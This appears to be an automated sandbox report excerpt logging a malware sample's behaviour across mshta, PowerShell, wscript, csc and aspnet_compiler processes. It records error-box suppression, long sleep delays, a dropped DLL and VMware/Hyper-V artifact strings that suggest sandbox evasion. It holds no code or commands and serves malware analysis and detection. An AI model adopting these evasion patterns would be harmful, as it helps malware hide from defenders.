                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5494Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4251Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8354Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1313Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1498Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4928Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4866Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\dnftngtc\dnftngtc.dllJump to dropped file
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6380Thread sleep time: -12912720851596678s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3272Thread sleep count: 8354 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3272Thread sleep count: 1313 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1804Thread sleep time: -9223372036854770s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1908Thread sleep count: 1498 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1908Thread sleep count: 299 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4020Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4592Thread sleep count: 4928 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5440Thread sleep time: -17524406870024063s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5744Thread sleep count: 4866 > 30Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 3096Thread sleep time: -540000s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,13_2_00403D74
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 60000Jump to behavior
                Source: powershell.exe, 00000003.00000002.1712155166.0000000004EF6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapter
                Source: powershell.exe, 00000003.00000002.1712155166.0000000004EF6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapter
                Source: wscript.exe, 00000006.00000002.1777797003.0000000005997000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\o
                Source: powershell.exe, 00000001.00000002.1836916318.0000000008634000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1833233000.000000000782E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: mshta.exe, 00000000.00000002.1704448215.0000000005709000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\G
                Source: powershell.exe, 00000001.00000002.1833233000.000000000782E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWj
                Source: powershell.exe, 00000009.00000002.2053858986.000000000A381000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 4'^qemU
                Source: powershell.exe, 00000003.00000002.1712155166.0000000004EF6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapter
                Source: powershell.exe, 00000009.00000002.1993969365.00000000071C8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll@
                Source: aspnet_compiler.exe, 0000000D.00000002.2893956116.0000000001528000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
